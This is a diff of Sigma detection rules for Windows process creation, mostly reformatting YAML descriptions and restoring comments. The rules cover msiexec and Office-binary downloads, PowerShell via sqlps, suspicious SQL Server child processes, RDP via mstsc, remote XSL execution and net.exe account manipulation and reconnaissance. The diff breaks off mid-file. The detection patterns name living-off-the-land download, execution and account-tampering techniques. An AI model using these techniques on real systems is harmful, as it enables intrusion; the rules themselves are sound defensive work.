b/sigma/builtin/process_creation/proc_creation_win_msiexec_web_install.yml @@ -1,8 +1,8 @@ title: MsiExec Web Install id: f7b5f842-a6af-4da5-9e95-e32478f3cd2f related: - - id: 8150732a-0c9d-4a99-82b9-9efb9b90c40c - type: similar + - id: 8150732a-0c9d-4a99-82b9-9efb9b90c40c + type: similar status: test description: Detects suspicious msiexec process starts with web addresses as parameter references: @@ -23,12 +23,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - ' msiexec' - :// condition: process_creation and selection falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_msohtmed_download.yml b/sigma/builtin/process_creation/proc_creation_win_msohtmed_download.yml index 906199966..e5303b12c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_msohtmed_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_msohtmed_download.yml @@ -19,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \MSOHTMED.exe - - OriginalFileName: MsoHtmEd.exe + - NewProcessName|endswith: \MSOHTMED.exe + - OriginalFileName: MsoHtmEd.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ftp:// - http:// - https:// diff --git a/sigma/builtin/process_creation/proc_creation_win_mspub_download.yml b/sigma/builtin/process_creation/proc_creation_win_mspub_download.yml index 292283e5d..2ac9c0c89 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mspub_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mspub_download.yml @@ -1,8 +1,7 @@ title: Arbitrary File Download Via MSPUB.EXE id: 3b3c7f55-f771-4dd6-8a6e-08d057a17caf status: test -description: Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary - files +description: Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary files references: - https://github.com/LOLBAS-Project/LOLBAS/pull/238/files author: Nasreddine Bencherchali (Nextron Systems) @@ -20,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \MSPUB.exe - - OriginalFileName: MSPUB.exe + - NewProcessName|endswith: \MSPUB.exe + - OriginalFileName: MSPUB.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ftp:// - http:// - https:// diff --git a/sigma/builtin/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml b/sigma/builtin/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml index e91f5b96b..2c88d172f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml @@ -1,14 +1,9 @@ title: Detection of PowerShell Execution via Sqlps.exe id: 0152550d-3a26-4efd-9f0e-54a0b28ae2f3 status: test -description: 'This rule detects execution of a PowerShell code through the sqlps.exe - utility, which is included in the standard set of utilities supplied with the - MSSQL Server. - - Script blocks are not logged in this case, so this utility helps to bypass protection - mechanisms based on the analysis of these logs. - - ' +description: | + This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server. + Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs. references: - https://docs.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15 - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/ @@ -31,14 +26,12 @@ detection: selection_parent: ParentProcessName|endswith: \sqlps.exe selection_image: - - NewProcessName|endswith: \sqlps.exe - - OriginalFileName: sqlps.exe + - NewProcessName|endswith: \sqlps.exe + - OriginalFileName: sqlps.exe filter_image: ParentProcessName|endswith: \sqlagent.exe - condition: process_creation and (selection_parent or (selection_image and not - filter_image)) + condition: process_creation and (selection_parent or (selection_image and not filter_image)) falsepositives: - - Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe - spawned by sqlagent.exe is a legitimate action. + - Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action. level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml b/sigma/builtin/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml index 710f68b70..8ce2bbe44 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml @@ -1,14 +1,9 @@ title: SQL Client Tools PowerShell Session Detection id: a746c9b8-a2fb-4ee5-a428-92bee9e99060 status: test -description: 'This rule detects execution of a PowerShell code through the sqltoolsps.exe - utility, which is included in the standard set of utilities supplied with the - Microsoft SQL Server Management studio. - - Script blocks are not logged in this case, so this utility helps to bypass protection - mechanisms based on the analysis of these logs. - - ' +description: | + This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio. + Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs. references: - https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OtherMSBinaries/Sqltoolsps.yml - https://twitter.com/pabraeken/status/993298228840992768 @@ -28,14 +23,13 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \sqltoolsps.exe - - ParentProcessName|endswith: \sqltoolsps.exe - - OriginalFileName: \sqltoolsps.exe + - NewProcessName|endswith: \sqltoolsps.exe + - ParentProcessName|endswith: \sqltoolsps.exe + - OriginalFileName: \sqltoolsps.exe filter: ParentProcessName|endswith: \smss.exe condition: process_creation and (selection and not filter) falsepositives: - - Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess - sqltoolsps.exe spawned by smss.exe is a legitimate action. + - Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action. level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_mssql_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_mssql_susp_child_process.yml index 53920eedb..416cdbb36 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mssql_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mssql_susp_child_process.yml @@ -1,11 +1,10 @@ title: Suspicious Child Process Of SQL Server id: 869b9ca7-9ea2-4a5a-8325-e80e62f75445 related: - - id: 344482e4-a477-436c-aa70-7536d18a48c7 - type: obsoletes + - id: 344482e4-a477-436c-aa70-7536d18a48c7 + type: obsoletes status: experimental -description: Detects suspicious child processes of the SQLServer process. This could - indicate potential RCE or SQL Injection. +description: Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection. author: FPT.EagleEye Team, wagga date: 2020/12/11 modified: 2023/05/04 @@ -24,7 +23,8 @@ detection: Channel: Security selection: ParentProcessName|endswith: \sqlservr.exe - NewProcessName|endswith: + NewProcessName|endswith: + # You can add other uncommon or suspicious processes - \bash.exe - \bitsadmin.exe - \cmd.exe @@ -40,10 +40,10 @@ detection: - \tasklist.exe - \wsl.exe filter_optional_datev: - CommandLine|startswith: '"C:\Windows\system32\cmd.exe" ' + CommandLine|startswith: '"C:\Windows\system32\cmd.exe" ' ParentProcessName|startswith: C:\Program Files\Microsoft SQL Server\ ParentProcessName|endswith: DATEV_DBENGINE\MSSQL\Binn\sqlservr.exe - NewProcessName: C:\Windows\System32\cmd.exe + NewProcessName: C:\Windows\System32\cmd.exe condition: process_creation and (selection and not 1 of filter_optional_*) level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_mssql_veaam_susp_child_processes.yml b/sigma/builtin/process_creation/proc_creation_win_mssql_veaam_susp_child_processes.yml index cde50bf23..2efdc8647 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mssql_veaam_susp_child_processes.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mssql_veaam_susp_child_processes.yml @@ -1,11 +1,10 @@ title: Suspicious Child Process Of Veeam Dabatase id: d55b793d-f847-4eea-b59a-5ab09908ac90 related: - - id: 869b9ca7-9ea2-4a5a-8325-e80e62f75445 - type: similar + - id: 869b9ca7-9ea2-4a5a-8325-e80e62f75445 + type: similar status: experimental -description: Detects suspicious child processes of the Veeam service process. This - could indicate potential RCE or SQL Injection. +description: Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection. references: - https://labs.withsecure.com/publications/fin7-target-veeam-servers author: Nasreddine Bencherchali (Nextron Systems) @@ -25,7 +24,7 @@ detection: ParentCommandLine|contains: VEEAMSQL ParentProcessName|endswith: \sqlservr.exe selection_child_1: - CommandLine|contains: + CommandLine|contains: - '-ex ' - bypass - cscript @@ -37,14 +36,14 @@ detection: - rundll32 - wscript - 'copy ' - NewProcessName|endswith: + NewProcessName|endswith: - \cmd.exe - \powershell.exe - \pwsh.exe - \wsl.exe - \wt.exe selection_child_2: - NewProcessName|endswith: + NewProcessName|endswith: - \net.exe - \net1.exe - \netstat.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_mstsc_rdp_hijack_shadowing.yml b/sigma/builtin/process_creation/proc_creation_win_mstsc_rdp_hijack_shadowing.yml index bc95bbd94..57a5fd8eb 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mstsc_rdp_hijack_shadowing.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mstsc_rdp_hijack_shadowing.yml @@ -19,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - noconsentprompt - 'shadow:' condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_mstsc_remote_connection.yml b/sigma/builtin/process_creation/proc_creation_win_mstsc_remote_connection.yml index d2ae4c3a5..48b0ea37c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mstsc_remote_connection.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mstsc_remote_connection.yml @@ -1,13 +1,9 @@ title: New Remote Desktop Connection Initiated Via Mstsc.EXE id: 954f0af7-62dd-418f-b3df-a84bc2c7a774 status: test -description: 'Detects the usage of "mstsc.exe" with the "/v" flag to initiate a connection - to a remote server. - - Adversaries may use valid accounts to log into a computer using the Remote Desktop - Protocol (RDP). The adversary may then perform actions as the logged-on user. - - ' +description: | + Detects the usage of "mstsc.exe" with the "/v" flag to initiate a connection to a remote server. + Adversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc @@ -25,12 +21,13 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \mstsc.exe - - OriginalFileName: mstsc.exe + - NewProcessName|endswith: \mstsc.exe + - OriginalFileName: mstsc.exe selection_cli: - CommandLine|contains: ' /v:' + CommandLine|contains: ' /v:' filter_optional_wsl: - CommandLine|contains: C:\ProgramData\Microsoft\WSL\wslg.rdp + # Example: mstsc.exe /v:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX /hvsocketserviceid:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX /silent /wslg /plugin:WSLDVC /wslgsharedmemorypath:WSL\XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\wslg C:\ProgramData\Microsoft\WSL\wslg.rdp + CommandLine|contains: C:\ProgramData\Microsoft\WSL\wslg.rdp ParentProcessName: C:\Windows\System32\lxss\wslhost.exe condition: process_creation and (all of selection_* and not 1 of filter_optional_*) falsepositives: diff --git a/sigma/builtin/process_creation/proc_creation_win_mstsc_run_local_rdp_file.yml b/sigma/builtin/process_creation/proc_creation_win_mstsc_run_local_rdp_file.yml index 98eb1dc88..cd34cc986 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mstsc_run_local_rdp_file.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mstsc_run_local_rdp_file.yml @@ -19,14 +19,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \mstsc.exe - - OriginalFileName: mstsc.exe + - NewProcessName|endswith: \mstsc.exe + - OriginalFileName: mstsc.exe selection_cli: - CommandLine|endswith: + CommandLine|endswith: - .rdp - .rdp" filter_optional_wsl: - CommandLine|contains: C:\ProgramData\Microsoft\WSL\wslg.rdp + CommandLine|contains: C:\ProgramData\Microsoft\WSL\wslg.rdp ParentProcessName: C:\Windows\System32\lxss\wslhost.exe condition: process_creation and (all of selection_* and not 1 of filter_optional_*) falsepositives: diff --git a/sigma/builtin/process_creation/proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml b/sigma/builtin/process_creation/proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml index 5d2934e61..afb22e706 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml @@ -1,8 +1,7 @@ title: Suspicious Mstsc.EXE Execution With Local RDP File id: 6e22722b-dfb1-4508-a911-49ac840b40f8 status: experimental -description: Detects potential RDP connection via Mstsc using a local ".rdp" file - located in suspicious locations. +description: Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations. references: - https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/ - https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/ @@ -19,14 +18,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \mstsc.exe - - OriginalFileName: mstsc.exe + - NewProcessName|endswith: \mstsc.exe + - OriginalFileName: mstsc.exe selection_extension: - CommandLine|endswith: + CommandLine|endswith: - .rdp - .rdp" selection_paths: - CommandLine|contains: + # Note: This list of paths is better transformed into a whitelist where you only exclude legitimate locations you use in your env + CommandLine|contains: - :\Users\Public\ - :\Windows\System32\spool\drivers\color - ':\Windows\System32\Tasks_Migrated ' @@ -34,7 +34,8 @@ detection: - :\Windows\Temp\ - :\Windows\Tracing\ - \AppData\Local\Temp\ - - \Downloads\ + # - '\Desktop\' # Could be source of FP depending on the environment + - \Downloads\ # Could be source of FP depending on the environment condition: process_creation and (all of selection_*) falsepositives: - Likelihood is related to how often the paths are used in the environment diff --git a/sigma/builtin/process_creation/proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml b/sigma/builtin/process_creation/proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml index 56712baa0..965ee4aba 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml @@ -1,8 +1,7 @@ title: Mstsc.EXE Execution From Uncommon Parent id: ff3b6b39-e765-42f9-bb2c-ea6761e0e0f6 status: experimental -description: Detects potential RDP connection via Mstsc using a local ".rdp" file - located in suspicious locations. +description: Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations. references: - https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/ - https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/ @@ -20,6 +19,7 @@ detection: Channel: Security selection_parent: ParentProcessName|endswith: + # Covers potential downloads/clicks from browsers - \brave.exe - \CCleanerBrowser.exe - \chrome.exe @@ -31,10 +31,11 @@ detection: - \opera.exe - \vivaldi.exe - \whale.exe + # Covers potential downloads/clicks from email clients - \outlook.exe selection_img: - - NewProcessName|endswith: \mstsc.exe - - OriginalFileName: mstsc.exe + - NewProcessName|endswith: \mstsc.exe + - OriginalFileName: mstsc.exe condition: process_creation and (all of selection_*) falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_msxsl_execution.yml b/sigma/builtin/process_creation/proc_creation_win_msxsl_execution.yml index 84e98dff0..88af0ba36 100644 --- a/sigma/builtin/process_creation/proc_creation_win_msxsl_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_msxsl_execution.yml @@ -1,14 +1,9 @@ title: Msxsl.EXE Execution id: 9e50a8b3-dd05-4eb8-9153-bdb6b79d50b0 status: test -description: 'Detects the execution of the MSXSL utility. This can be used to execute - Extensible Stylesheet Language (XSL) files. These files are commonly used to describe - the processing and rendering of data within XML files. - - Adversaries can abuse this functionality to execute arbitrary files while potentially - bypassing application whitelisting defenses. - - ' +description: | + Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data within XML files. + Adversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/ @@ -26,9 +21,10 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \msxsl.exe + NewProcessName|endswith: \msxsl.exe condition: process_creation and selection falsepositives: - Msxsl is not installed by default and is deprecated, so unlikely on most systems. +# Note: If you levreage this utility please consider adding additional filters. As this is looking for "any" type of execition level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_msxsl_remote_execution.yml b/sigma/builtin/process_creation/proc_creation_win_msxsl_remote_execution.yml index 03f13fc96..cb9dbc6f9 100644 --- a/sigma/builtin/process_creation/proc_creation_win_msxsl_remote_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_msxsl_remote_execution.yml @@ -1,8 +1,7 @@ title: Remote XSL Execution Via Msxsl.EXE id: 75d0a94e-6252-448d-a7be-d953dff527bb status: experimental -description: Detects the execution of the "msxsl" binary with an "http" keyword in - the command line. This might indicate a potential remote execution of XSL files. +description: Detects the execution of the "msxsl" binary with an "http" keyword in the command line. This might indicate a potential remote execution of XSL files. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/ @@ -19,8 +18,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: http - NewProcessName|endswith: \msxsl.exe + CommandLine|contains: http + NewProcessName|endswith: \msxsl.exe condition: process_creation and selection falsepositives: - Msxsl is not installed by default and is deprecated, so unlikely on most systems. diff --git a/sigma/builtin/process_creation/proc_creation_win_net_default_accounts_manipulation.yml b/sigma/builtin/process_creation/proc_creation_win_net_default_accounts_manipulation.yml index 930366678..960899977 100644 --- a/sigma/builtin/process_creation/proc_creation_win_net_default_accounts_manipulation.yml +++ b/sigma/builtin/process_creation/proc_creation_win_net_default_accounts_manipulation.yml @@ -1,8 +1,7 @@ title: Suspicious Manipulation Of Default Accounts Via Net.EXE id: 5b768e71-86f2-4879-b448-81061cbae951 status: test -description: Detects suspicious manipulations of default accounts such as 'administrator' - and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc +description: Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc references: - https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html - https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/ @@ -21,54 +20,53 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - NewProcessName|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_user_option: - CommandLine|contains: ' user ' + CommandLine|contains: ' user ' selection_username: - CommandLine|contains: - - " J\xE4rjestelm\xE4nvalvoja " - - ' Rendszergazda ' - - " \u0410\u0434\u043C\u0438\u043D\u0438\u0441\u0442\u0440\u0430\u0442\ - \u043E\u0440 " - - ' Administrateur ' - - ' Administrador ' - - " Administrat\xF6r " - - ' Administrator ' + CommandLine|contains: + # Note: We need to write the full account name for cases starting with 'admin' to avoid lookups only with the user flag + - ' Järjestelmänvalvoja ' # Finish + - ' Rendszergazda ' # Hungarian + - ' Администратор ' # Russian + - ' Administrateur ' # French + - ' Administrador ' # Portuguese (Brazil + Portugal) + Spanish + - ' Administratör ' # Swedish + - ' Administrator ' # English - ' guest ' - ' DefaultAccount ' - - " \"J\xE4rjestelm\xE4nvalvoja\" " - - ' "Rendszergazda" ' - - " \"\u0410\u0434\u043C\u0438\u043D\u0438\u0441\u0442\u0440\u0430\u0442\ - \u043E\u0440\" " - - ' "Administrateur" ' - - ' "Administrador" ' - - " \"Administrat\xF6r\" " - - ' "Administrator" ' + # The cases below are for when an attacker requests the net command via 'cmd /c....' + # First in double quotes + - ' "Järjestelmänvalvoja" ' # Finish + - ' "Rendszergazda" ' # Hungarian + - ' "Администратор" ' # Russian + - ' "Administrateur" ' # French + - ' "Administrador" ' # Portuguese (Brazil + Portugal) + Spanish + - ' "Administratör" ' # Swedish + - ' "Administrator" ' # English - ' "guest" ' - ' "DefaultAccount" ' - - " 'J\xE4rjestelm\xE4nvalvoja' " - - ' ''Rendszergazda'' ' - - " '\u0410\u0434\u043C\u0438\u043D\u0438\u0441\u0442\u0440\u0430\u0442\ - \u043E\u0440' " - - ' ''Administrateur'' ' - - ' ''Administrador'' ' - - " 'Administrat\xF6r' " - - ' ''Administrator'' ' - - ' ''guest'' ' - - ' ''DefaultAccount'' ' + # Second in single quotes + - " 'Järjestelmänvalvoja' " # Finish + - " 'Rendszergazda' " # Hungarian + - " 'Администратор' " # Russian + - " 'Administrateur' " # French + - " 'Administrador' " # Portuguese (Brazil + Portugal) + Spanish + - " 'Administratör' " # Swedish + - " 'Administrator' " # English + - " 'guest' " + - " 'DefaultAccount' " filter: - CommandLine|contains|all: + CommandLine|contains|all: - guest - /active no condition: process_creation and (all of selection_* and not filter) falsepositives: - - Some false positives could occur with the admin or guest account. It depends - on the scripts being used by the admins in your env. If you experience a lot - of FP you could reduce the level to medium + - Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_net_groups_and_accounts_recon.yml b/sigma/builtin/process_creation/proc_creation_win_net_groups_and_accounts_recon.yml index 61f8ec46f..37097413d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_net_groups_and_accounts_recon.yml +++ b/sigma/builtin/process_creation/proc_creation_win_net_groups_and_accounts_recon.yml @@ -1,14 +1,12 @@ title: Suspicious Group And Account Reconnaissance Activity Using Net.EXE id: d95de845-b83c-4a9a-8a6a-4fc802ebf6c0 status: test -description: Detects suspicious reconnaissance command line activity on Windows systems - using Net.EXE +description: Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE references: - https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/ - https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/ - https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/ -author: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali - (Nextron Systems) +author: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems) date: 2019/01/16 modified: 2023/03/02 tags: @@ -23,35 +21,38 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - NewProcessName|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe + # Covers group and localgroup flags selection_group_root: - CommandLine|contains: + CommandLine|contains: - ' group ' - ' localgroup ' selection_group_flags: - CommandLine|contains: + CommandLine|contains: + # Add more groups for other languages - domain admins - - ' administrator' - - ' administrateur' + - ' administrator' # Typo without an 'S' so we catch both + - ' administrateur' # Typo without an 'S' so we catch both - enterprise admins - Exchange Trusted Subsystem - Remote Desktop Users - - "Utilisateurs du Bureau \xE0 distance" - - Usuarios de escritorio remoto - - ' /do' + - Utilisateurs du Bureau à distance # French for "Remote Desktop Users" + - Usuarios de escritorio remoto # Spanish for "Remote Desktop Users" + - ' /do' # short for domain filter_group_add: - CommandLine|contains: ' /add' + # This filter is added to avoid the potential case where the point is not recon but addition + CommandLine|contains: ' /add' + # Covers 'accounts' flag selection_accounts_root: - CommandLine|contains: ' accounts ' + CommandLine|contains: ' accounts ' selection_accounts_flags: - CommandLine|contains: ' /do' - condition: process_creation and (selection_img and ((all of selection_group_* - and not filter_group_add) or all of selection_accounts_*)) + CommandLine|contains: ' /do' # short for domain + condition: process_creation and (selection_img and ((all of selection_group_* and not filter_group_add) or all of selection_accounts_*)) fields: - CommandLine - ParentCommandLine @@ -60,6 +61,5 @@ falsepositives: - Administrative activity level: medium analysis: - recommendation: Check if the user that executed the commands is suspicious (e.g. - service accounts, LOCAL_SYSTEM) + recommendation: Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM) ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_net_network_connections_discovery.yml b/sigma/builtin/process_creation/proc_creation_win_net_network_connections_discovery.yml index 1c94ce4de..f0a893581 100644 --- a/sigma/builtin/process_creation/proc_creation_win_net_network_connections_discovery.yml +++ b/sigma/builtin/process_creation/proc_creation_win_net_network_connections_discovery.yml @@ -1,9 +1,7 @@ title: System Network Connections Discovery Via Net.EXE id: 1c67a717-32ba-409b-a45d-0fb704a73a81 status: test -description: Adversaries may attempt to get a listing of network connections to or - from the compromised system they are currently accessing or from remote systems - by querying for information over the network. +description: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-1---system-network-connections-discovery author: frack113 @@ -20,19 +18,19 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - NewProcessName|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_cli: - - CommandLine|endswith: - - ' use' - - ' sessions' - - CommandLine|contains: - - ' use ' - - ' sessions ' + - CommandLine|endswith: + - ' use' + - ' sessions' + - CommandLine|contains: + - ' use ' + - ' sessions ' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_net_share_and_sessions_enum.yml b/sigma/builtin/process_creation/proc_creation_win_net_share_and_sessions_enum.yml index 03fb03f76..26c1b8374 100644 --- a/sigma/builtin/process_creation/proc_creation_win_net_share_and_sessions_enum.yml +++ b/sigma/builtin/process_creation/proc_creation_win_net_share_and_sessions_enum.yml @@ -1,8 +1,7 @@ title: Share And Session Enumeration Using Net.EXE id: 62510e69-616b-4078-b371-847da438cc03 status: stable -description: Detects attempts to enumerate file shares, printer shares and sessions - using "net.exe" with the "view" flag. +description: Detects attempts to enumerate file shares, printer shares and sessions using "net.exe" with the "view" flag. references: - https://eqllib.readthedocs.io/en/latest/analytics/b8a94d2f-dc75-4630-9d73-1edc6bd26fff.html - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md @@ -20,16 +19,16 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - NewProcessName|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_cli: - CommandLine|contains: view + CommandLine|contains: view filter: - CommandLine|contains: \\\\ + CommandLine|contains: \\\\ condition: process_creation and (all of selection_* and not filter) fields: - SubjectUserName diff --git a/sigma/builtin/process_creation/proc_creation_win_net_share_unmount.yml b/sigma/builtin/process_creation/proc_creation_win_net_share_unmount.yml index d8db8556f..a24850ecd 100644 --- a/sigma/builtin/process_creation/proc_creation_win_net_share_unmount.yml +++ b/sigma/builtin/process_creation/proc_creation_win_net_share_unmount.yml @@ -1,9 +1,7 @@ title: Unmount Share Via Net.EXE id: cb7c4a03-2871-43c0-9bbb-18bbdb079896 status: test -description: Detects when when a mounted share is removed. Adversaries may remove - share connections that are no longer useful in order to clean up traces of their - operation +description: Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md author: oscd.community, @redcanary, Zach Stanford @svch0st @@ -20,14 +18,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - NewProcessName|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - share - /delete condition: process_creation and (all of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_net_start_service.yml b/sigma/builtin/process_creation/proc_creation_win_net_start_service.yml index 99cd11875..c60ac8531 100644 --- a/sigma/builtin/process_creation/proc_creation_win_net_start_service.yml +++ b/sigma/builtin/process_creation/proc_creation_win_net_start_service.yml @@ -1,8 +1,7 @@ title: Start Windows Service Via Net.EXE id: 2a072a96-a086-49fa-bcb5-15cc5a619093 status: test -description: Detects the usage of the "net.exe" command to start a service using the - "start" flag +description: Detects the usage of the "net.exe" command to start a service using the "start" flag references: - 